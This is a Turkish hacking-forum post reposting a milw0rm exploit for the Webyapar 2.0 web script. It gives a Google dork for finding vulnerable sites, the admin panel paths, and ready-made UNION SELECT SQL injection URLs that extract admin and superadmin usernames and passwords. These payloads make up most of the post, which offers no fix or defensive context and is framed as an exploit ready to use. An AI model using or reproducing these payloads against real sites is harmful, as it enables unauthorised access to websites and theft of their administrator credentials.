HGT Hack Good Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.
HGT Hack Good Team

Sitemize Hos Geldiniz
 
AnasayfaAnasayfa  PortalliPortalli  AramaArama  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yap  

 

 Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities

Aşağa gitmek 
YazarMesaj
Admin
Admin
Admin
Admin


Mesaj Sayısı : 131
Kayıt tarihi : 12/10/07

Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities Empty
MesajKonu: Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities   Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities Icon_minitimePtsi Ekim 15, 2007 2:08 pm

# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability

# AUTHOR: : bypass

# script name : Webyapar v2.0 { 700$ }

# Language : Tr

# scritp web page : www.webyapar.com

# script bug : remote sql enjeksiyon

# script admin panel1 : http://victim/script_path/yonetim

# script admin panel2 : http://victim/script_path/yonetim2

# google dork : inurl:"?page=duyurular_detay&id="

# Message Tr : Hayat İllegal - / -


< / -------------------------------------------------------------------------------------------------------- />


< / ------ Example sql bug 1 admin username : ------ / >


http://VİCTİM/SCRİPT_PATH/?page=down...ici+from+admin




< / ------ Example sql bug 1 admin password : ------ / >


http://VİCTİM/SCRİPT_PATH/?page=down...fre+from+admin




< / ------ Example sql bug 2 superadmin password and admin username : ------ / >



http://VİCTİM/SCRİPT_PATH/?page=duyu...rom+superadmin

< / -------------------------------------------------------------------------------------------------------- />


Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin

Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+a dmin

# milw0rm.com
Sayfa başına dön Aşağa gitmek
https://hackgoodteam.yetkin-forum.com
 
Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» GetMyOwnArcade (search.php query) Remote SQL Injection Vulne
» vBulletin 3.6.8 Remote File Include
» IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vu
» Joomla Component EventList <= 0.8 (did) SQL Injection Vul
» Game Portal Manager v1.7 SQL Injection Vulnerability

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
HGT Hack Good Team :: Hacking :: Exploitler-
Buraya geçin: